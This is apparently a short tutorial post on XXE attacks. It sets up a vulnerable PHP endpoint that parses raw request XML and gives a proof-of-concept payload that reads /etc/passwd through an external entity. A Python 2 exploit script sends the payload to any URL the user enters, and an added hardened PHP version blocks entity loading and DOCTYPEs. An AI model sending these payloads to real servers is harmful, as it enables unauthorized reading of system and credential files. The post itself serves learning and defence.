
Learning XXE Attacks

Date: 2017-12-27 12:01:58


Environment: LAMP

Contents of simplexml_load_string.php:

 

<?php
$data = file_get_contents('php://input');
$xml = simplexml_load_string($data);
echo $xml->name;
?>

 

POC:

<?xml version="1.0" encoding="utf-8"?>
<!DOCTYPE xxe [
<!ELEMENT name ANY >
<!ENTITY xxe SYSTEM "file:///etc/passwd" >]>
<root>
<name>&xxe;</name>
</root>

EXP:

# -*- coding: utf-8 -*-
# Python 2 script (urllib2, raw_input, print statement)
import urllib2

if __name__ == '__main__':
    # Prompt: enter the file to read, e.g. file:///etc/passwd
    print u'输入要读取的文件,如file:///etc/passwd'
    payload = raw_input()
    # Prompt: enter the address to request, e.g. http://IP/simplexml_load_string.php
    print u'输入要访问的地址,如http://IP/simplexml_load_string.php'
    url = raw_input()
    #url = 'http://IP/simplexml_load_string.php'
    headers = {'Content-type': 'text/xml'}
    xml = '<?xml version="1.0" encoding="utf-8"?><!DOCTYPE xxe [<!ELEMENT name ANY ><!ENTITY xxe SYSTEM "' + payload + '" >]><root><name>&xxe;</name></root>'
    req = urllib2.Request(url = url,headers = headers, data = xml)
    res_data = urllib2.urlopen(req)
    res = res_data.read()
    print res
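
A hardened counterpart to the vulnerable simplexml_load_string.php above, as an added example that is not part of the original post: it parses without entity substitution, rejects any request body that declares a DOCTYPE, and escapes the echoed value. The helper name parse_untrusted_xml and the premise that this endpoint never needs a DTD are assumptions of this example.

```php
<?php
// Added example, not from the original post. parse_untrusted_xml() is a
// hypothetical helper; assumption: this endpoint never needs a DTD.
function parse_untrusted_xml(string $data): ?SimpleXMLElement
{
    if ($data === '') {
        return null;
    }
    // Keep parser warnings out of the HTTP response.
    $previous = libxml_use_internal_errors(true);

    // Before PHP 8.0 the linked libxml2 may be older than 2.9 and substitute
    // external entities by default, so switch the external entity loader off.
    // The call is deprecated as of PHP 8.0, which requires libxml2 >= 2.9.
    if (PHP_VERSION_ID < 80000) {
        libxml_disable_entity_loader(true);
    }

    $dom = new DOMDocument();
    // LIBXML_NONET forbids network access while parsing. LIBXML_NOENT and
    // LIBXML_DTDLOAD are deliberately not passed: they enable entity
    // substitution and external DTD loading.
    $ok = $dom->loadXML($data, LIBXML_NONET);
    libxml_clear_errors();
    libxml_use_internal_errors($previous);
    if (!$ok) {
        return null;
    }

    // Refuse any document that declares a DOCTYPE, as the POC does.
    foreach ($dom->childNodes as $child) {
        if ($child->nodeType === XML_DOCUMENT_TYPE_NODE) {
            return null;
        }
    }
    $xml = simplexml_import_dom($dom);
    return $xml instanceof SimpleXMLElement ? $xml : null;
}

$body = file_get_contents('php://input');
$xml = parse_untrusted_xml($body === false ? '' : $body);
if ($xml === null) {
    http_response_code(400);
    exit('invalid XML');
}
// Escape the value before echoing it back.
echo htmlspecialchars((string) $xml->name, ENT_QUOTES, 'UTF-8');
```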

 

 


Original article: https://www.cnblogs.com/NBeveryday/p/8124539.html
